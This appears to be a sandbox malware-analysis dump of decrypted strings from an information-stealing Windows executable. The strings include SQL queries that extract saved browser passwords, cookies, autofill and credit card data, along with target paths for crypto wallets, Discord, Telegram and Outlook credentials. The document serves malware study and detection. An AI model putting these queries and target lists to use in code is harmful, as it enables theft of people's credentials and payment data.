Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GdiplusStartup
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GdiplusShutdown
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GdipSaveImageToStream
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GdipDisposeImage
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GdipFree
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetHGlobalFromStream
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: CreateStreamOnHGlobal
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: CoUninitialize
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: CoInitialize
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: CoCreateInstance
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: BCryptDecrypt
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: BCryptSetProperty
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: BCryptDestroyKey
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetWindowRect
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetDesktopWindow
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetDC
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: CloseWindow
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: wsprintfA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: EnumDisplayDevicesA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetKeyboardLayoutList
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: CharToOemW
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: wsprintfW
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: RegQueryValueExA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: RegEnumKeyExA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: RegOpenKeyExA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: RegCloseKey
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: RegEnumValueA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: CryptBinaryToStringA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: CryptUnprotectData
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: SHGetFolderPathA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: ShellExecuteExA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: InternetOpenUrlA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: InternetConnectA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: InternetCloseHandle
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: InternetOpenA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: HttpSendRequestA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: HttpOpenRequestA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: InternetReadFile
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: InternetCrackUrlA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: StrCmpCA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: StrStrA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: StrCmpCW
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: PathMatchSpecA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: GetModuleFileNameExA
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: RmStartSession
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: RmRegisterResources
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: RmGetList
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: RmEndSession
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: sqlite3_open
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: sqlite3_prepare_v2
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: sqlite3_step
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: sqlite3_column_text
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: sqlite3_finalize
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: sqlite3_close
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: sqlite3_column_bytes
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: sqlite3_column_blob
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: encrypted_key
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: PATH
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: NSS_Init
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: NSS_Shutdown
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: PK11_FreeSlot
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: PK11_Authenticate
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: PK11SDR_Decrypt
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: C:\ProgramData\
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: browser:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: profile:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: url:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: login:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: password:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: Opera
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: OperaGX
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: Network
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: cookies
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: .txt
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: TRUE
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: FALSE
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: autofill
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: SELECT name, value FROM autofill
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: history
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: name:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: month:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: year:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: card:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: Cookies
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: Login Data
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: Web Data
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: History
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: logins.json
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: formSubmitURL
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: usernameField
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: encryptedUsername
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: encryptedPassword
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: guid
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: cookies.sqlite
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: formhistory.sqlite
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: places.sqlite
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: plugins
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: Local Extension Settings
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: Sync Extension Settings
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: IndexedDB
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: Opera Stable
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: Opera GX Stable
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: CURRENT
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: chrome-extension_
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: _0.indexeddb.leveldb
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: Local State
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: profiles.ini
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: chrome
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: opera
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: firefox
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: wallets
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: %08lX%04lX%lu
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: ProductName
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: ProcessorNameString
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: DisplayName
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: DisplayVersion
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: Network Info:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: - IP: IP?
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: - Country: ISO?
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: System Summary:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: - HWID:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: - OS:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: - Architecture:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: - UserName:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: - Computer Name:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: - Local Time:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: - UTC:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: - Language:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: - Keyboards:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: - Laptop:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: - Running Path:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: - CPU:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: - Threads:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: - Cores:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: - RAM:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: - Display Resolution:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: - GPU:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: User Agents:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: Installed Apps:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: All Users:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: Current User:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: Process List:
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: system_info.txt
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: freebl3.dll
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: mozglue.dll
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: msvcp140.dll
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: nss3.dll
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: softokn3.dll
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: vcruntime140.dll
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: \Temp\
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: .exe
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: runas
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: open
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: /c start
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: %DESKTOP%
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: %APPDATA%
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: %LOCALAPPDATA%
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: %USERPROFILE%
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: %DOCUMENTS%
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: %PROGRAMFILES%
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: %PROGRAMFILES_86%
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: %RECENT%
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: *.lnk
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: files
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: \discord\
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: \Local Storage\leveldb
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: \Telegram Desktop\
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: key_datas
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: D877F783D5D3EF8C*
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: map*
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: A7FDF864FBC10B77*
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: F8806DD0C461824F*
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: Telegram
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: *.tox
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: *.ini
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: Password
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack	String decryptor: 00000001
